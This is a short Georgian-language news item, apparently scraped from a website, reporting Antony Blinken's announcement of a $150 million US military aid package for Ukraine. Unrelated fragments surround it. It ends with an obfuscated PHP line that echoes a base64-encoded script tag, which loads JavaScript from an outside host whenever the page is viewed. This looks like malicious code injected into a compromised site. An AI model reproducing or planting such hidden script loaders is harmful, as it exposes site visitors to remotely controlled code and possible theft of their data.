celsiusi
ავერსი საქკაბელი
აშშ-ის სახელმწიფო მდივანმა, ენტონი ბლინკენმა განაცხადა, რომ პრეზიდენტ ბაიდენის მიერ გამოცხადებული უკრაინისთვის განკუთვნილი აშშ-ის სამხედრო დახმარების უახლესი პაკეტი 150 მილიონი აშშ დოლარის ღირებულებისაა.
 
მისი თქმით, დახმარების უახლესი ტრანში მოიცავს 25 000 155 მმ-იან საარტილერიო ტყვიას, ასევე არტილერიის საწინააღმდეგო რადარებს, სხვადასხვა აღჭურვილობას და სათადარიგო ნაწილებს მოიცავს.
 
„150 მილიონი აშშ დოლარის ღირებულების დამატებითი იარაღის, აღჭურვილობისა და მარაგის უკრიანისთვის გამოყოფის ნებართვა გავეცი, რათა გაძლიერდეს მისი თავდაცვა აღმოსავლეთში რუსეთის თავდასხმის დასაპირისპირებლად“, - განაცხადა ბლინკენმა.
 
ბლინკენმა აღნიშნა, რომ აშშ-ის უახლესი 150 მილიონიანი პაკეტით ვაშინგტონის სამხედრო დახმარებამ, რუსეთის უკრაინაში შეჭრის დროიდან, საერთო ჯამში, დაახლოებით 3.8 მილიარდ აშშ დოლარს მიაწია.
693
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");